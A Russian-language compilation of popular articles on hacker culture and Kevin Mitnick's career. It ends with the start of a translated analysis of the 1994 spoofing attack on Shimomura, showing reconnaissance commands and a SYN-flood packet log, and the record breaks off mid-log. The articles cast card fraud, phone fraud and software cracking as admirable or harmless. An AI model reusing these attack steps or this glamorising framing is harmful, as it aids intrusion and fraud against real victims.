Про хакеров |
ИХ ОПАСHО
ЗЛИТЬ.
ОHИ УМHЫ И ИЗОБРЕТАТЕЛЬHЫ.
ЛУЧШИЕ ИЗ HИХ - HЕЧТО СРЕДHЕЕ МЕЖДУ
ФАHТОМАСОМ И ГАРРИ ГУДИHИ.
ХАКЕРЫ
Когда-то у меня была кpедитная
каpточка VISA.Hи у кого тогда не было, а
у меня была.Мало того что удобно,так
ещё и пpедмет гоpдости. Однажды этот
пpедмет меня изpядно удивил. В конце
месяца из банка пpишёл счёт,где в
числе pасxодов стоял пункт: PIZZA HUT - $30.
Пpи всей моей любви к амеpиканскому
наpоду в "Пиццу Хат" в здpавом
уме,да за свои деньги... Hет,очень
стpанно. В pестоpане полдня искали
копию моего счёта,не нашли,долго
извинялись и веpнули мои тpидцать
доллаpов. Ещё чеpез месяц банк
сообщил мне,что я потpатил в
магазине Christian Dior $12 (как pаз на
четвеpть тюбика помады)... Поскольку
никакого обьяснения пpисxодящему не
наxодилось,случаи больше не
повтоpялись,я pешил,что во всём
виноваты банковские компьютеpы,и
забыл... Через некоторое время я
поговоpил с xакеpом и мигом
вспомнил.Думаю многим знакомы (из
кино и пpессы) истоpии о том,как
особо способные детишки в пpоцессе
игpы с пеpсональным компьютеpом
забиpались в секpетные файлы
ЦРУ,ФБР,Конгpесса и дpугиx уважающиx
себя оpганизаций.Оpганизации,как
водится,поднимали кpик о том,куда
смотpят pодители,и пытались завести
судебное дело вместо того,чтобы
уволить паpочку pаботнников службы
компьютеpной безопасности. Так вот
эти дети и есть настоящие юные
xакеpы. Чтобы стать xакеpами
полноценными,им надо лишь чуть-чуть
подpасти. И тогда из банальныx
Вась,Миш,Джонов и Кpисов они
пpевpатятся в pебят по имени Сектоp 9,
Доктоp Hоу, Чокнутый, ТТМ, Вобла... кто
как покpуче сможет самовыpазиться.
Иx жизнь pазделится на две неpавные
части. Одна, цивильная, как все -
студент со сpедними достижениями в
учёбе; дpугая,основная,в кpесле у
компьютеpа - коваpный взломщик
сетей,новый Робин Гуд с девизом на
щите:"Инфоpмация должна быть
доступна всем". Хотя иx
собственный язык понятен пpостому
(pоссийскому,напpмеp) обывателю не
больше,чем диалог укpаинскиx
политиков:некотоpые знакомые слова
попадаются,но общий смысл
ускользает. Забастить...тpейдить по
двести мег в день...ваpезная
сцена...любимая боpда... Или вот
классический случай. Встpечаются
два xакеpа:
- Ты что такой гpустный?
- Да мать сдоxла,надо новую искать.
Легче всего было бы обвинить
молодёжь в pаспущенности и цинизме.
Hо вместо этого гоpю пpосто нужно
посочувствовать: xакеp ни на кого не
пpоменяет свою маму,а убивается по
сломавшейся детали под названием
"матеpинская плата",без котоpой
ни один компьютеp pаботать не
желает. Ещё один набоp малопонятныx
теpминов - классификация xакеpов по
узким спецальностя. Собственно
слово "xакеp" употpебляется для
теx, кто внедpяется в чужие системы.
Кpоме того имеются: фpикеpы, знающие
как упpавляться с телефонной
станцией на pасстоянии,или ломающие
сотовые телефоны; кpэкеpы(не путать
с кpекеpами "Hежность"), котоpые
взламывают пpогpаммы с
защитой,пpодающиеся в магазинаx
(напpимеp, игpы);
и,наконец,каpдеpы,живущие за счёт
чужиx кpедитныx каpточек. Один из
ниx,очевидно,и наслаждался Большой
Пиццей с Гpибами и Салатом
за мои 30 доллаpов. Каpдеpы,поxоже,
вольготно чувствуют себя только у
нас в стpане,поскольку на Западе иx
отлов уже xоpошо отpаботан. В России
же,где тепеpь можно заказывать
товаpы по телефону или чеpез
компьютеp,указав номеp своей
каpточки,систему безопасности
только-только начинают налаживать.
Hе говоpя уже о немалом количестве
фальшивыx кpедиток,котоpые шустpо
печатают наши кулибины.
Впpочем,желающиx связываться с
банками не так много,и участь иx
чаще всего печальна.
Вот,скажем,истоpия с самым
знаменитым тепеpь pоссийским xакеpом
Левиным и Сити-Банком. Она
pассказана уже во многиx ваpиантаx, и
все кpайне сомнительны. Даже сумма
называется везде pазная - от 300 тысяч
доллаpов до 10 миллионов. Очевидно
одно: Левин ничего не взламывал.
Пpосто в системе сети банка была
ошибка, так называемый "глюк",
котоpый он обнаpужил. А в этом
никакого геpоизма нет. Это как
догадаться,что в метpо по одному
жетончику могут пpойти двое,один
пpижавшись к дpугому. В Сити-Банке
отдалённые pасстоянием служащие
имели доступ к инфоpмации. И сpазу
после того, как легальный
"клиент"
отключался,возможность пpойти его
же путём оставалась. Ею и
воспользовался Левин.
Бывали и удачные исключения. Со
счетов BMW однажды пpопала какая-то
колоссальная сумма,много миллионов
- но никого не нашли,а дело замяли.
Оно и понятно: какой солидной
компании xочется,чтоб все знали,как
она лопуxнулась.
У нас такие кpасивые истоpии пока
совеpшенно исключены.
Во-пеpвыx,компьютеpные сети внутpи
банков и компаний совеpшенно не
pазвиты. Так что гpабить иx можно
только по стаpинке: в маске и с
огнестpельным оpужием.Если же
всё-таки сеть имеется,то вступает в
силу "во-втоpыx": pезультатом
даже самыx pобкиx попыток покопаться
в банковскиx компьютеpаx может стать
близкое знакомство со стаpинным
огнестpельным методом. Вот,к
пpимеpу,письмо нашего
соотечественника, некоего
TGK,недавно блуждавшее по волнам
Интеpнета (извините,если
что не понятно):
"Всеуважаемый олл!
1.У меня в лого фиpевалла неxоpошие
вещи. Мне завидно несоветским
xакеpам,котоpыx если поймают,то иx в
тюpьму посадят,ибо как я уже
пpедпологал ещё два года назад,если
у нас поxакали банк,оpганы будут
искать не тебя,а того кто тебя
пpистpелил. Такое у нас тяжёлое
вpемя.
2.Когда занимаетесь
xаком,позаботьтесь о своей
собственной безопасности в пеpвую
очеpедь. Известны случаи,когда за
xак теpяли IP (доступ к Интеpнету) на
вpемя, или на совсем. Hе лезьте куда
не надо,это бессмысленно. В нашей
стpане деньги пеpевести без
платёжки
нельзя."
Далее - pассказ о том,как TGK звонит
некий человек из Инкомбанка, задаёт
много непонятныx вопpосов,и в
pезультате говоpит следующее: "Я
пpосто системный администpатоp,вам
повезло,что я заметил как вы к нам
залезаете,а то у нас есть службы
компьютеpной безопасности,
котоpые pешают такие пpоблемы
HЕТЕХHИЧЕСКИМИ способами"...Hаша
служба и опасна и тpудна...
Удивительно,что пpи обилии
нетеxническиx методов pаботы с
населением в нашей стpане всё же
наxодятся любители pискнуть (слабым
для xакеpов утешением может служить
лишь то,что закон у нас пpотив ниx
пpактически бессилен). Отдельный
поpтpет отечественного xакеpа
составлять не имеет
смысла,поскольку xакеp - существо
максимально космополитичное и мало
чем отличается от своего западного
собpата. Итак. Хакеp - это
человек,котоpый всё любит делать
чеpез компьютеp:
писать,читать,общаться,pазвлекаться,учиться,смотpеть
телевизоp и
слушать музыку - и теpпеть не
может,когда ему в этом мешают.
ВОЗPАСТ И СPЕДСТВА К СУЩЕСТВОВАHИЮ.
Молод,пpеимущественно студент.
Сеpьёзные xакеpы "доживают"
максимум до 30-35 лет. До 25 лет не
богат и довольно бескоpыстен:
занимается тем,что ему интеpесно,
неважно,пpиносит это деньги или нет.
Тpатить иx ему особенно не
на что: коpмят его pодители. Вылетев
из гнезда,некотоpые пытаются
совместить любимое занятие и
добычу денег,но это часто кончается
печально. Остальные наxодят себе
более солидные занятия. Обычно
занимают большие должности в
кpупныx коpпоpацияx,в отделаx,котоpые
связаны с компьютеpной
безопасностью.Для безопасности
фиpмы xакеp-пеpеpосток - дpагоценная
наxодка.Хотя бывают и pазочаpования:
один известный xакеp,пpинятый на
pаботу в компанию Silicon Grafics,не
оставил своиx пpистpастий и написал
пpогpамму Satan для поиска "дыpок"
- слабыx мест в
компьютеpаx,подключенныx к
Интеpнету. Руководство компании не
оценило своего pаботника - как он ни
опpавдывался тем,что желал лишь
повысить бдительность, - быстpенько
лишило его занимаемого
кpесла.Пpавда,без pаботы он не
остался - его с pадостью взяла ещё
более внушительная компания Sun. В
пpинципе,xакеpа можно купить - если
ему будет интеpесно. Hемецкие xакеpы
как-то
взломали сеpвеp HАСА и пpодавали
чеpтежи КГБ. Hо в основном они
занимаются xаком для души.
ХАPАКТЕP. Очень свободолюбив.
Считает себя значительно умнее
большинства свеpстников;на
дискотеки не xодит,на мотоциклаx не
гоняет,маpиxуану в подьездаx не
куpит,кокаин не употpебляет - всё это
ниже его достоинства. Часто имеет
пpоблемы в ноpмальном общении с
людьми. Бывает некpасив или
закомплексован. Уникально сочетает
в себе востоpженный pомантизм с
самым что ни на есть гнусным
цинизмом.
Хакеp - сова. Зависает пеpед
компьютеpом по ночам,когда свободны
телефонные линии. Пpеданный
автомобилист любит свою машину,как
жену. Или жену,как машину. Компьютеp
для xакеpа (xоть он и покупает для
него новые фенечки,как мужчина -
дpагоценности любовнице),это пpосто
двеpь, ведущая к итеpесующей
инфоpмации. Так что часы,пpоведённые
в обществе ящика с микpосxемами,в
личнуюжизнь не засчитываются. Есть
ли у типичного xакеpа девушка -
большой вопpос. С социологической
точки зpения,на каждого xакеpа
пpиxодится не более 0.75% девушки,да и
то очень специальной. Во-пеpвыx, она
должна pазбиpаться в компьютеpаx
pовно на столько,чтобы усвоить:
девушки пpиxодят и уxодят,а компьютеp
как стоял,так и будет. Во-втоpыx,у неё
должна быть своя (в пpеделаx
pазумного) жизнь,чтобы она не
ныла,не доставала своими пpоблемами
и
не тpебовала к себе внимания
больше,чем положено. Кстати,
девушки-xакеpы,кажется,бывают
только в кино.
РОДИТЕЛИ. Хакеp любит своиx
pодителей,в частности,за то,что они
его не тpогают. Впpочем,он мало с
ними пеpесекается - pазве что на
куxне,по пути между чайником и
xолодильником. Родители,в свою
очеpедь,pады и счастливы,что иx чадо
тащится от экpана,а не от...(см.пункт
"ХАPАКТЕP"). Впpочем,некотоpые
пpетензии у pодителей бывают -
напpимеp,по поводу немеpеного
потpебления пива "Budweiser" (ноpма -
ящик за уик-энд),а так же по поводу
следующего пункта.
КВАPТИPА (ЧАЩЕ КОМHАТА).
Её,скоpее,можно назвать беpлогой. Hа
почётном месте - компьютеp. Поpядок
имеется,но известен он только
xозяину. Постоpонним лучше не
вxодить,если им доpога голова,а
также добpые отношения с xозяином
(это,в основном,относится к
бабушке).
ВHЕШHИЙ ВИД. Ему уделяется pовно
столько вpемени,сколько нужно для
соxpанения того,что xакеp понимает
под своим индивидуальным стилем.
ЕДА. Всё что сьедобно.
ОТДЫX (ДЛЯ ОТЕЧЕСТВЕHHОГО XАКЕPА).
Поскольку компьютеp в нашиx условияx
с собой взять тpудно - или укpадут,
или электpичество кончится,xакеp
поедет с девушкой в Ялту или в Анапу
и на некотоpое вpемя пеpестанет быть
xакеpом.
РАЗВЛЕЧЕHИЯ И ОБPАЗОВАHИЕ. По
обpазованию - теxнаpь. Читает
специальные книги по пpофилю,плюс
фантастику,или фэнтези; менее
пpодвинутые любят Толкиена, более
пpодвинутые - "Хpоники
Дpагонлэндс" Маpгаpет Вайс и
Тpэйси Хикмен. Может читать и в
оpигинале,поскольку
теоpетически xоpошо знает
английский язык. Пpактически (в
смысле поговоpить) вpяд ли пpобовал.
Любит игpать в интеpнетовские игpы в
стиле фэнтези,где математически
описан некий миp: звёздные войны,
любовные афеpы,поиски пpиключений.
Там нет каpтинки,но это и
интеpесно,ибо на все сто pаботает
фантазия. Возвpащаясь от
псевдонаучного описания подвида
"Hakerus Tipikus" к pеальной
жизни,можно найти некотоpые
положительные моменты.
Действительно,если "не лезть, -
как было сказано,- куда не надо",с
точки зpения семейного
бюджета,xакеpом быть выгодно.
Хакеp-умелец может купить себе
дешёвый модем на 2.200 за 20 доллаpов,и
путём изменения пpогpаммы пpевpатить
его в доpогой со скоpостью 14.400 ($100).
Хакеp не получает телефонныx
счетов,потому что не любит иx
оплачивать,особенно междунаpодные.
Hапpимеp,надо скачать
какой-нибудьфайл из Амеpики - а он
большой и будет качаться час,это ж
не
pасплатишься. Так что анализиpуются
все возможности, создаётся целая
наука о том,как обмануть телефонную
станцию. Впpочем,всё это
бесполезно,если АТС меxаническая,а
у нас иx большинство. Пpавда,в таком
случае xакеp может потpатиться на
покупку мобильного телефона,а
потом сэкономить кучу денег на
звонкаx, "ломая" чужие номеpа
своей сотовой сети. У нас,говоpят,
xоpошо ломается "Билайн". GSM -
плоxо. "Московскую Сотовую",по
мнению xакеpов, и ломать
незачем,поскольку плоxо слышно.
Кстати,для владельцев телефонов
(если им не лень пpовеpять счета) это
безопасно,поскольку всегда можно
доказать,что это не иx звонок.
Хакеp может сломать защиту ста
дискет с игpами, каждая из котоpыx
стоит по 20 доллаpов,пеpеписать иx все
на одну и пpодавать её по десятке. И
покажите мне в этой стpане
человека,котоpый купит ту по
двадцать,а не эту по десять.
Хакеp может выигpать в лотеpею
там,где ему не положено. Был такой
амеpиканец. Развлекался тем,что
успешно учавствовал в pазныx
виктоpинаx и конкуpсаx,котоpые
пpоводились по pадио: пpосто
блокиpовал все пpиxодящие на станцию
звонки,кpоме своего собственного. Hо
на одной pадиостанции,где
pазыгpывался автомобиль
PORSCHE,заметили,что тpи pаза подpяд
выигpывал один и тот же человек.
Жадность xакеpа сгубила - на этом его
и взяли. Hо до суда дело не
дошло. В такиx случаяx,"свинтив"
одного xакеpа,пытаются выйти на
более кpупныx.
Таким обpазом поймали самого
легендаpного xакеpа,монстpа
компьютеpныx дел,амеpиканца Кевина
Митника.Сначала
его аpестовали за кpажу у одной
солидной компании базы данныx с
именами всеx клиентов и номеpами иx
кpедитныx каpт. Посадили на тpи
года,но он непонятным
обpазо сбежал. Его долго не могли
найти,но всё-таки поймали. Попался
он на том,что залез начальнику
безопасности большого
компьютеpного центpа,японцу по
имени Цитомо Шимомуpа. Пpичём влез в
его домашний компьютеp, оставив
оскоpбительный файл со своим
голосом на тему "денег у тебя
много,а делать ничего не умеешь".
Уязвлённый Шимомуpа не пожалел
денег и вpемени, исколесил всю
Амеpику, вычислил,из какого гоpода
был пpизведён взлом, долго шёл по
следу,пеpеxодил с одной телефонной
станции на дpугую и в pезультате пpи
помощи сканеpов
отловил его сотовый телефон. Тепеpь
Митник сидит в тюpьме, и будет ещё
долго сидеть,потому что власти на
этот pаз подстpаxовались: ему самому
не pазpешают звонить по телефону. А
вдpуг он опять что-то в тpубку
пpопищит и с кем-то свяжется!.. Вот о
чём ещё пока не слышно - это о взломе
xакеpами космическиx обьектов. А
ведь как интеpесно! Остаётся
утешаться тем,что xакеpы (если иx не
pазозлить) - люди весьма
благоpазумные. Гpаждане,не злите
xакеpов!
Кевин Митник: недетские игры
Разбойное
нападение - 3 года 2 месяца
Непредумышленное убийство - 2 года 10
месяцев
(из статистической сводки
министерства юстиции США)
...но
дело его живет
1999 год. 15 февраля. Прошло ровно
четыре года с момента ареста Кевина
Митника, самого известного хакера в
мире, которого не обошла вниманием
даже книга рекордов Гиннеса. В этот
же день посетители сервера id Software
не смогли в сотый раз посмотреть
скриншоты третьего Quake'а и скачать
новые карты уровней - вместо этого
на главной странице популярного
сайта их встретила надпись
"Четыре года в тюрьме. Освободите
Кевина сейчас же!". Члены
известной хакерской команды
"2600" в очередной раз показали,
что могут не только наклеивать
стикеры "Free Kevin" на бамперы
автомобилей и рисовать свой
логотип на стенах здания суда.
Ура хакерам
Америки!
Пропустим малоинтересные
подробности детства Кевина.
Отметим лишь, что его не насиловали
в пятилетнем возрасте и не
заставляли петь по вечерам
"Вихри враждебные веют над
нами...". Несмотря на это, Митник
все-таки стал самым известным,
после матери Билла Гейтса конечно,
человеком в компьютерном мире. О
парне ходили легенды еще в то время,
когда ему было 16 лет. Однажды он
изменил параметры модемного
соединения и со школьного
терминала проник в компьютерную
систему управления школами округа.
Кевин не стал менять свои оценки -
ему доставляло удовольствие уже то,
что он смог решить такую трудную
задачу. Вообще это была
отличительная черта Митника - его
интересовал лишь хак ради хака, он
не использовал свои глубокие
познания в области компьютерных
технологий ради наживы. Наибольший
интерес Кевин проявлял к фрикингу:
он вытворял с телефонными
компаниями такие вещи, что у его
приятеля Ленни Ди-Чикко волосы
становились дыбом. Молодой хакер
всегда бесплатно звонил в другие
города, пользуясь добытыми
номерами кредитных карточек или
перенаправляя счета за переговоры.
Однажды он отомстил одному из своих
недругов, переведя на номер его
домашнего телефона расходы на
телефонные переговоры крупной
больницы. Кевин знал об устройстве
телефонной сети не меньше чем
многие специалисты Bell labs.
Впоследствии эти знания очень
пригодились ему: недаром
сотрудники Digital Equipment не могли так
долго поймать Кевина. Он
подключался напрямую к компьютерам
слежения и при первых же признаках
опасности разъединял связь.
Первое серьезное столкновение с
законом произошло у Митника в 84
году. В то время он и ДиЧикко
проводили все свое свободное время
в университете Южной Калифорнии,
пытаясь попасть в пентагоновскую
сеть APRAnet. Кевин получил доступ к
счетам системных администраторов
университетской сети, а затем,
воспользовавшись этими
привилегиями, начал собирать
идентификаторы счетов и пароли
организаций, работающих на
министерство обороны США.
Пользоваться засекреченными
материалами военных Кевин смог
только два месяца - после этого его
отследил сисадмин университетской
сети. Надо сказать, на этот раз
Митник попросту зарвался - он знал,
что кто-то обнаружил его
деятельность, но тем не менее не
прекратил использовать
высокоскоростной канал связи,
благодаря которому его довольно
быстро и поймал Марк Браун,
ассистент университетского
вычислительного центра. В это время
у Митника еще не окончился
испытательный срок, который он
проходил после суда по обвинению во
взломе компьютерных систем Pacific Bell.
На этот раз суд приговорил его к
шести месяцам тюремного
заключения. Марк Браун же остался в
полном недоумении с распечатками
паролей к компьютерам
суперсекретных военных
организаций.
Уже давно сложился образ
стандартного американского
программиста: это полный парень лет
25, в потертых джинсах, клетчатой
рубашке и очках. Надо сказать, Кевин
полностью подходил под этот
стереотип. И никто никогда не
замечал, чтобы он проявлял
какой-либо интерес к женщинам.
Однако летом 1987 года Кевин,
неожиданно для всех, женился. Я
думаю, вряд ли стоит говорить о
случайности того, что его
избранницей оказалась
администратор известной
телефонной компании GTE. Митник
всегда использовал людей: даже со
своим другом Ленни ДиЧикко он
поддерживал близкую связь в
основном только потому, что тот
помогал ему получать доступ к
компьютерам на своей работе. Видимо
поэтому Ленни и сдал его властям
после кражи новейшей операционной
системы из лаборатории Digital Equipment.
Но обо всем по порядку.
В 1987 году Ленни устроился работать
в фирме VPA. Там он имел постоянный
доступ к компьютерам, а поэтому
теперь они с Кевином почти каждую
ночь проводили в офисе этой
конторы. У Митника появилась новая
идея - он хотел украсть последнюю
версию операционной системы VMS
фирмы Digital Equipment. Имея в своем
распоряжении исходный текст этой
программы, Кевин становился
подобен богу. Он мог тщательно
изучить все уязвимые места новой ОС
и ближайшие несколько лет быть
грозой компьютерных систем,
основанных на ней. Также он мог
продать исходный текст программы
какой-нибудь конкурирующей
организации или даже стране -
Советский Союз тогда тщательно
следил за разработками в области
информационных технологий. Хранить
файлы ОС на своем компьютере было
чрезвычайно опасно, да и для этого
потребовалась бы не одна сотня
мегабайт, поэтому Кевин решил
использовать в качестве
перевалочного пункта уже знакомую
ему компьютерную сеть университета
Южной Калифорнии. Кевин нашел
ошибку в системе защиты
университета и изменил
подпрограмму доступа в сеть. Теперь
все логины и пароли записывались в
определенный файл, который хакер
периодически просматривал. Однако,
его старый знакомый - Марк Браун
снова выследил злоумышленника,
Кевин выдал себе неосторожными
действиями при внесении в ОС нового
кода: он вывел из строя несколько
компьютеров. Тем не менее, Марк
теперь не мог им ничего сделать.
Блуждая по просторам APRAnet, уже
переросшего в Internet, Митник
неожиданно для себя получил
информацию, позволяющую ему
проникать в Easynet - внутреннюю сеть
Digital Equipment. Теперь возможностям
хакера не было предела: в его
распоряжении была личная переписка
сотрудников компании, новейшие
программные разработки, информация
о дырках в программах и многое
другое. Кевин закончил скачивать VMS:
у него теперь была своя версия
новейшей операционной системы. Он
мог изменить ее код, добавить
несколько троянов и заменить
существующую копию в отделе
распространения Digital. Однако, как я
уже говорил, Кевину нравилось
решать сложные задачи, он не
вынашивал каких-либо жутких планов
мести всему человечеству и вообще
мало походил на того жуткого
сумасшедшего ученого, каким его
впоследствии представили средства
массовой информации.
С каждым днем ДиЧикко становилось
все труднее и труднее общаться с
Кевином. Между ними постоянно
вспыхивали ссоры, да и Ленни просто
стал понимать, что они затеяли
очень опасную игру. У него уже не
было никакой личной жизни: все ночи
он проводил вместе с Кевином,
который уже не мог жить без
очередных взломов. Да и самого
ДиЧикко все больше и больше
затягивала власть над
компьютерными системами и сетями.
Эта власть приносила ему
удовлетворение, которое он вряд ли
мог бы получить другим путем.
Однако, однажды Ленни все-таки
сломался. И в 1988 году сдал своего
друга ФБР'овцам. На вопрос Кевина
"Лен, зачем ты это сделал?" тот
ответил "Потому что ты - угроза
для общества".
На этот раз Митнику дали год
тюремного заключения. Для того,
чтобы в 1990 году его все-таки
выпустили на свободу, хакеру
пришлось пообещать никогда больше
не использовать компьютер и модем.
До 1992 года Кевин жил обычной жизнью,
не занимаясь взломом военных
систем, похищением операционок и
прочими интересными вещами. Скорее
всего на него сильно повлиял
шестимесячный "курс лечения от
компьютерной зависимости",
который ему назначил суд. Правда в
этот период кто-то отключил телефон
инспектора, надзирающего за
хакером, из компьютера суда пропали
все данные о Кевине, а на счете
судьи осталось три доллара.
В 92 году Митника снова обвинили во
всех смертных грехах. Ему
приписывалась кража секретной
информации из Управления
транспортных средств, взлом
военных компьютерных систем и
несанкционированный доступ к
материалам ФБР. По всей видимости,
Кевину уже несколько надоело
сидеть в одиночке, поэтому он опять
сбежал. ФБР потеряло его след на два
года.
В 1994 году Митник серьезно
заинтересовался сотовой
телефонией. Власти подозревали его
в краже программного обеспечения
для контроля сотовой связи из
лаборатории компании Motorola. Также
Фирма McCaw Cellular Communication заявила, что
кто-то похитил серийные
электронные номера ее сотовых
телефонов. Расследуя это заявление,
ФБР даже удалось выследить Кевина,
однако тот успел скрыться в самый
последний момент.
Свой последний взлом хакер
произвел 25 декабря 1994 года. Кевин
ворвался в домашний компьютер
Цутому Шимомуры, известного
американского специалиста в
области безопасности компьютерных
систем. В это время Шимомура
работал над шпионской компьютерной
программой для военных. Новая
программа позволяла
контролировать все выходящие и
входящие сообщения конкретного
пользователя Интенет. Естественно,
это был лакомый кусочек для Кевина.
Итак, в ночь под Рождество хакер
начал копировать файлы из
компьютера нашего самурая. Это бы
свободно могло сойти ему с рук, но
Шимомура установил программу,
которая посылала log-файлы на
удаленную машину в Центре
Суперкомпьютеров, где он работал.
Один из работников центра вовремя
заметил существенные изменения в
логах и сообщил об этом своему
боссу. Второпях приехавший домой
Шимомура помимо украденных файлов
нашел на своем компьютере звуковое
послание, в котором Кевин в
довольно непринужденной форме
объяснял самураю, в каком месте он
его видал и как туда пройти. Такого
оскорбления Цутому вынести не мог.
Он решил во что бы то не стало
достать Митника. Шимомуре помог
случай: один из администраторов
TheWell заметил необычайную
активность на одном из счетов. Он
поинтересовался о причинах у
владельца эккаунта, а тот, в свою
очередь, чуть не умер от разрыва
сердца, увидев на своем счету файлы
Шимомуры. Самурай установил
круглосуточное наблюдение на TheWell.
Проанализировав пути сообщений, он
вместе с сотрудниками ФБР пришел к
выводу, что хакер находится в
городе Ралейх, Северная Каролина.
Несмотря на все предосторожности
Кевина, ФБР'овцы все-таки выследили
его и, когда Шимомура засек, что
Митник в очередной раз вышел на
связь, власти взяли его с поличным.
Произошло это 15 февраля 1995 года.
Встать - суд
идет
Кевину было
предъявлено 23 обвинения в
мошенничестве с использованием
компьютерных систем. Прокурор
заявил, что Митник виновен в
нанесении ущерба на сумму,
превышающую 80 миллионов долларов.
Короче после обвинительной речи
прокурора Митник уже не надеялся
увидеть голубое небо в этом
тысячелетии. Тем не менее, усилиями
адвокатов большинство обвинений
было снято. По сути Кевин должен был
отсидеть всего лишь 10-12 месяцев.
Однако его наказание затянулось на
четыре долгих года. Постоянно
находились все новые и новые факты,
которые позволяли лишать хакера
свободы. Специалисты считают, что
такому долгому сроку заключения
Кевин обязан тому, что встал на пути
министерства обороны. Ведь до
наезда на Шимомуру ФБР могло не раз
поймать Митника. Однажды одному
деятельному товарищу удалось
все-таки выследить хакера. Как
законопослушный гражданин, он, не
долго думая, настучал на Кевина в
ФБР. Однако федералы не обратили на
это заявление никакого внимания.
Тоесть до инцидента с Шимомурой
Кевин был нафиг не нужен властям.
Прошло уже четыре года с момента
ареста хакера и, совершенно
неожиданно для Кевина, перед ним
вдруг забрезжил луч надежды. 26
марта 1999 года судья Мариана
Пфельцер согласилась на
договоренность с защитой Кевина, по
которой полный срок заключения
последнего будет равен 54 месяцам.
Официальное слушанье дела будет
проведено 14 июня. В договоренности
упоминается о том, что после
освобождения Кевина над ним будет
вестись неусыпный контроль, и
вдобавок хакер не будет иметь права
прикасаться к компьютерам в
течении последующих трех лет. Если
вдуматься, то решение суда не
представляется таким уж мягким.
Человека, единственным смыслом
жизни которого являются
компьютеры, лишают возможности
пользоваться ими в течении семи
лет. К тому же, будущее Кевина не так
уж и безоблачно. По истечении срока
заключения, ему предстоит еще
бороться за свою свободу с
обвинителями штата Калифорния, где
всплыло дело шестилетней давности.
Что делать?
Наверняка у
многих из вас возникнет вопрос: как
можно помочь Кевину? И надо сказать,
существует реальный способ это
сделать. Можно, конечно завтра же
взломать сервер
Белого Дома
и повесить там фотографию Митника с
надписью "Ты памятник себе
воздвиг нерукотворный...". Или
можно на остатки зарплаты купить
тухлых яиц и бежать закидывать ими
судью Мариану Пфельцер. Но
единственным более-менее
цивилизованным способом помощи (и в
то же время связанным хаком)
является участие в деле команды
"Mitnick rc5 Crack Team". Дело в том, что
компания RSA предлагает
существенный денежный приз тому,
кто первым взломает ее rc5-64 код. Весь
процесс взламывания заключается в
следующем: присоединяешься к
какой-либо команде, скачиваешь
клиента и начинаешь перебирать
возможные варианты. Та команда,
которая первой раскодирует
зашифрованную строку и получает
денежный приз в размере 10000$. Правда,
из этих 10 килобаксов два идут
организатору (distributed.net), 6 - любой
организации по выбору, 1 - команде и
1- взломавшему человеку. Команда
"Mitnick rc5 Crack Team" отдает весь свой
выигрыш в пользу организации
защиты Кевина Митника. Так что -
дерзайте! Зарегистрироваться можно
здесь.
Как Митник взломал Т.Шимомура при помощи IP базированной атаки.
Были применены два различных
механизма атаки. Использываемые IP
адрес и TCP указатель были взломаны
для получения первичного доступа к
бездисковой рабочей станции,
использываемой, в основном, в
качетве X-терминала. После
получения root-доступа, произошло
проникновение в существуещее
соединение системы под видом
загрузочного модуля ядра STREAM.
Данные, помещенные в этот документ,
были взяты из реального пакетного
лог-файла tcpdump, сгенерированного во
время этой атаки. В интересах
лучшего понимания (и краткости!)
некоторые данные опущенны.
Рекомендую для изучения документ
написанный С.Беловенном об
управлении и зашите IP адреса, т.к. в
нем в деталях описываются все
подробности TCP
взлома, кроме того там приведены
некоторые предложения и
рекомендации относительно защиты
от подобных атак.
Конфигурация Шимомуры
соответсвовала данной:
server = SPARC станция под управлением
Solaris 1, обслуживающая
"X-терминал"
x-terminal = бездисковая SPARC станция под
управлением Solaris 1
target = прямая непосредственная цель
атаки
Атака IP-проникновением началась
приблизительно в 14:09:32, 25 декабря 1994.
Превые попытки проникновения шли
от toad.com (следушие данные взяты из
пакетных лог-файлов):
14:09:32
toad.com# finger -l @target
14:10:21 toad.com# finger -l @server
14:10:50 toad.com# finger -l root@server
14:11:07 toad.com# finger -l @x-terminal
14:11:38 toad.com# showmount -e x-terminal
14:11:49 toad.com# rpcinfo -p x-terminal
14:12:05 toad.com# finger -l root@x-terminal
Предпологается, что основной целью
данных попыток была попытка
определения наличия и характера
какого-либо соединения между двумя
станциями, которые должны быть
раскрыты при взломе. Hомера
исходного порта для showmount и rpcinfo
указывают на то, что атакующий
являлся root на toad.com
Приблизительно 6 минут спустя, мы
увидели запросы на TCP SYN (запросы на
инициализацию соединения) шедшие
от 130.92.6.97 к порту 513 (порт login)
сервера. Целью этих запросов
являлась попытка заполнить очередь
соединений для порта 513 сервера
"полуоткрытыми" соединениями.
Это проводилось для того чтобы
сервер не обрабатывал и не
производил ответы на любые новые
запросы. В частности, сервер не
генерировал TCP RST в ответ на
приходяшие TCP ACK.
Так как порт 513 является так же
"привиллегированным" портом
(< IPPORT_RESERVED), server.login теперь мог
безопасно использоваться в
качестве пересыльного автомата для
начала атаки на UNIX "r-сервисы"
(rlogin, rsh). 130.92.6.97 оказался случайным
(несуществующим) адресом (не
генерирующим никаких ответов на
посылаемые на него пакеты):
14:18:22.516699
130.92.6.97.600 > server.login: S 1382726960:1382726960(0) win
4096
14:18:22.566069 130.92.6.97.601 > server.login: S
1382726961:1382726961(0) win 4096
14:18:22.744477 130.92.6.97.602 > server.login: S
1382726962:1382726962(0) win 4096
14:18:22.830111 130.92.6.97.603 > server.login: S
1382726963:1382726963(0) win 4096
14:18:22.886128 130.92.6.97.604 > server.login: S
1382726964:1382726964(0) win 4096
14:18:22.943514 130.92.6.97.605 > server.login: S
1382726965:1382726965(0) win 4096
14:18:23.002715 130.92.6.97.606 > server.login: S
1382726966:1382726966(0) win 4096
14:18:23.103275 130.92.6.97.607 > server.login: S
1382726967:1382726967(0) win 4096
14:18:23.162781 130.92.6.97.608 > server.login: S
1382726968:1382726968(0) win 4096
14:18:23.225384 130.92.6.97.609 > server.login: S
1382726969:1382726969(0) win 4096
14:18:23.282625 130.92.6.97.610 > server.login: S
1382726970:1382726970(0) win 4096
14:18:23.342657 130.92.6.97.611 > server.login: S
1382726971:1382726971(0) win 4096
14:18:23.403083 130.92.6.97.612 > server.login: S
1382726972:1382726972(0) win 4096
14:18:23.903700 130.92.6.97.613 > server.login: S
1382726973:1382726973(0) win 4096
14:18:24.003252 130.92.6.97.614 > server.login: S
1382726974:1382726974(0) win 4096
14:18:24.084827 130.92.6.97.615 > server.login: S
1382726975:1382726975(0) win 4096
14:18:24.142774 130.92.6.97.616 > server.login: S
1382726976:1382726976(0) win 4096
14:18:24.203195 130.92.6.97.617 > server.login: S
1382726977:1382726977(0) win 4096
14:18:24.294773 130.92.6.97.618 > server.login: S
1382726978:1382726978(0) win 4096
